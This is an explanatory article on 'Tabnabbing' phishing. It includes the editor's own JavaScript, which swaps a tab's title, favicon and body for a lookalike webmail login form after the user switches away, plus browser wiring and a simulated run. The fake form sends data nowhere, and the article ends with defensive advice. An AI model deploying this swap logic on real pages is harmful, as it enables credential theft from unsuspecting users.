One of the latest phishing vessels to set sail has been christened “Tabnabbing” by interface designer Aza Raskin. Here’s how they catch you: let’s say you visit a malicious page (or a legitimate one that has been compromised to carry the script). The script waits, biding its time until you switch to another tab or minimize your browser window. Once you’re not looking, the page rewrites itself in place: its title, favicon and contents are swapped for a carefully crafted copy of, say, Bank of America, Facebook or Hotmail. Nothing is actually redirected, so the address bar still shows the original site’s URL, but few people re-read the address bar of a tab they think they left open a while ago. You assume you’ve just left a tab open, you enter your credentials, and just like that they have your info. The truly alarming part is that the page can also detect which sites you frequent (even sites you’re currently logged into), for example with the CSS :visited history-sniffing trick that was already known at the time, so the fake can be chosen to match a site you really use, making the threat far more targeted and potentially successful. Raskin’s article is itself a working example of the technique, though the user name and password fields on its fake login page will not let you enter any information.
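To make the mechanics concrete, here is an added illustration of the timing logic described above. It is the editor’s own code, not Raskin’s proof of concept, and the impersonated “Example Webmail” login form is constructed for the example. The page and timer are passed in as small objects so the same logic can be exercised under Node (names such as `createTabnabber` and `FakeTimers` are this example’s own); `attachToBrowser` shows how the real `window`/`document` would be wired up and is not executed here.

```javascript
// Constructed lookalike content the page swaps itself for (hypothetical site).
const DISGUISE = {
  title: 'Example Webmail - Sign in',
  favicon: '/fake-webmail.ico',
  body: '<form id="fake-login"><input name="user"><input name="pass" type="password"></form>',
};

// page:   { title, favicon, body, href }  (plain object, or a real-DOM adapter)
// timers: { set(fn, ms) -> id, clear(id) }
function createTabnabber(page, timers, opts = {}) {
  const delayMs = opts.delayMs ?? 5000;
  const disguise = opts.disguise ?? DISGUISE;
  const original = { title: page.title, favicon: page.favicon, body: page.body };
  let pending = null;
  let swapped = false;

  function swap() {
    page.title = disguise.title;
    page.favicon = disguise.favicon;
    page.body = disguise.body;
    swapped = true; // page.href is untouched: no navigation ever happens
  }

  return {
    // User left the tab: start the clock, once, and only before the swap.
    onBlur() {
      if (swapped || pending !== null) return;
      pending = timers.set(() => { pending = null; swap(); }, delayMs);
    },
    // User came back too soon: abort, nothing visible has changed.
    onFocus() {
      if (pending !== null) { timers.clear(pending); pending = null; }
    },
    isSwapped: () => swapped,
    original,
  };
}

// Deterministic timer for running the logic without a browser.
class FakeTimers {
  constructor() { this.now = 0; this.next = 1; this.due = new Map(); }
  set(fn, ms) { const id = this.next++; this.due.set(id, { at: this.now + ms, fn }); return id; }
  clear(id) { this.due.delete(id); }
  advance(ms) {
    this.now += ms;
    for (const [id, t] of [...this.due]) {
      if (t.at <= this.now) { this.due.delete(id); t.fn(); }
    }
  }
}

// Real-browser wiring: adapts window/document to the interface above.
function attachToBrowser(win, doc, opts) {
  const icon = doc.querySelector('link[rel~="icon"]');
  const page = {
    get title() { return doc.title; }, set title(v) { doc.title = v; },
    get favicon() { return icon ? icon.href : ''; }, set favicon(v) { if (icon) icon.href = v; },
    get body() { return doc.body.innerHTML; }, set body(v) { doc.body.innerHTML = v; },
    get href() { return win.location.href; },
  };
  const timers = { set: (fn, ms) => win.setTimeout(fn, ms), clear: (id) => win.clearTimeout(id) };
  const nab = createTabnabber(page, timers, opts);
  win.addEventListener('blur', nab.onBlur);
  win.addEventListener('focus', nab.onFocus);
  return nab;
}

// Scenario: victim leaves briefly (no swap), then leaves long enough (swap).
// Returns what the victim would see at each point.
function runScenario() {
  const page = { title: 'Harmless Blog', favicon: '/blog.ico', body: '<p>Article</p>',
                 href: 'http://blog.example/post' }; // constructed sample page
  const timers = new FakeTimers();
  const nab = createTabnabber(page, timers, { delayMs: 5000 });
  const seen = [];
  nab.onBlur(); timers.advance(1000); nab.onFocus(); // back early: timer cancelled
  seen.push({ title: page.title, swapped: nab.isSwapped(), href: page.href });
  nab.onBlur(); timers.advance(5000);                 // stayed away: swap fires
  seen.push({ title: page.title, swapped: nab.isSwapped(), href: page.href });
  return seen;
}
```

The point to take from the scenario is the last field: after the swap the tab’s title, icon and form all say “Example Webmail”, but `href` is still the blog’s URL. The address bar is the one thing the page’s script cannot rewrite, which is why checking it (or starting from a fresh tab) is the defence.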
Since the attack runs from the web page itself, nothing has to be installed on your computer: it is ordinary JavaScript on the page that rewrites what the tab shows, so there is no file for your anti-virus to catch, and it is useless in this scenario. The forthcoming Account Manager for Firefox promises to prevent this and other phishing threats, but it is still in beta testing. For now your best bet is to always start from a new browser tab or window when you’re about to enter sensitive information, to look at the address bar before you type (the URL is the one thing the page cannot fake), and to close any windows and tabs you’re finished with.
